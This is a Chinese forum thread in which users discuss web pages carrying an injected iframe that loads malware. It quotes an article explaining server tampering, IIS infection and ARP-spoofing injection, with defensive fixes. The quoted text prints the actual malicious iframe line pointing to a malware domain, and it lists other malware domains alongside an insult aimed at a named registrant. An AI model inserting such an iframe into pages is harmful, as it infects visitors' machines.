主题：【原创】不安装插件就不能浏览论坛吗？能不能有一个安静点的学术氛围？

看看这篇文章:
最挠头的问题来了，症状：客户机打开的网页查看源代码都被加了一行< frame src='http://iii.832823.cn/aaa.htm' width=100 height=1></i-frame-X>，位置不固定，打开该网页的机器都连接该网页下载病毒，有可能造成杀毒软件报警．这个情况有很多原因造成，总结了下，先说web服务器端的原因，最简单的，页面文件,js或者包含文件被直接篡改，添加了以上内容，这个好办，改回来就是，平时仔细设置文件权限，读取的内容决不给写入权限，消灭所有系统漏洞．稍微复杂的， iis病毒利用系统漏洞，不修改网页文件本身，是在iis处理的过程中，将代码加入网页传递给客户端，造成浏览的用户中毒．解决方法，重装iis，打好补丁．手工查杀可以新建一只有一个页面一行代码的网站，打开filemon监视文件，打开网站，看filemon的监控记录，我碰到的是除调用网站本身文件之外，还调用了C:\Inetpub\wwwroot\iisstart.htm，去瞅了瞅，那行该死的代码就在里边呢，删了它就好了，当然手工修复之前先清除木马什么的，要不还会被他修改回来的．最讨厌的，ＡＲＰ病毒挂马，就是俺这次碰上的，ＡＲＰ欺骗，顾名思义，就是通过ＡＲＰ协议对客户和路由进行欺骗，电脑在局域网内通信是通过mac地址实现的，网关A和客户机B各自维护着一张ARP表，机器C通过ARP欺骗，将B的arp表中网关的MAC改成它自己的的，从而使客户机B的数据先发送到C，它处理完后才转发给真正的网关，当然，也可以欺骗网关，将原本发送B的数据也拦截下来。所以，不管是C是攻击者还是病毒的受害者，它都在该局域网内充当了一个代理或者第二网关，理论上未作保护的网络中所有的数据都会通过机器C的转发或处理，这样就可以理解ARP病毒挂马的原理了，如果A是web服务器，B是正常用户，不论C是在A还是B的局域网内，都可以抓下服务器发送的http数据包，加入上边的代码后再转发给B，造成打开网页被挂马。所以有时候有人说打开sohu,sina这种超级大站也能发现病毒，其实真是冤枉人家了，要么是本机，要么是本地局域网络中有中arp挂马病毒。对于网站管理员来说，区分服务器被挂马还是客户端网络被挂马还是比较重要的，现在大部分服务器都放着N多网站，在服务器本地使用http://127.0.0.1或http://本机ip的方式打开网页，若所有的网页还是有不明代码出现，可确定服务器本身中奖，建议用上面filemon的方式杀毒。在该局域网内通过http://服务器ip 的方式登陆，因为arp欺骗的不稳定性，存在病毒的的话网页也不是100%都会被挂上木马。至于说一般用户，发现163,sohu,sina 等等大站也出现不明代码，还是从自己这里找找原因吧，或者直接反映给管理员。
　　
　　ARP病毒现在真是越来越泛滥了，最可怕的就是你本身没中毒，也可能造成密码泄漏，挂木马，掉线==问题，没有很好地解决办法，相对来说pppoe拨号稍微安全点，局域网用户只能通过在本地和网关的双向绑定来确保安全了。偶就是这么解决的，实在没有精力去追杀染毒的用户了，我花一个小时杀，它能五分钟给你再感染上，得不偿失！！网管同志可以在dns或者域名过滤上下下功夫，让病毒网站域名无法解析是个被动的有效的解决办法，就是不大好搜集，呵呵。
　　
　　乱七八糟写了一大堆，水平所限，有问题的话大家交流，别拍我。顺便问候一下832821.cn，832822.cn，832823cn，878772.cn，69642.cn，3696781.cn的注册人李想的母亲，教教孩子去攻击攻击国外网站，别成天在国内放毒，招人骂，惹人厌，弄不好就玩到公安局去，我代表广大的受害者鄙视你，人渣。

由于有人对北方区的网关进行arp欺骗,造成数据被人篡改,被加入恶意代码返回给用户,现本网已对该情况进行了处理，恢复了正常.

对于进行欺骗的机器，本网已将相关信息交给机房处理,多谢这位网友及时提供此信息.

原文由 seavoh 发表:
　　乱七八糟写了一大堆，水平所限，有问题的话大家交流，别拍我。顺便问候一下832821.cn，832822.cn，832823cn，878772.cn，69642.cn，3696781.cn的注册人李想的母亲，教教孩子去攻击攻击国外网站，别成天在国内放毒，招人骂，惹人厌，弄不好就玩到公安局去，我代表广大的受害者鄙视你，人渣。

水怪就是高．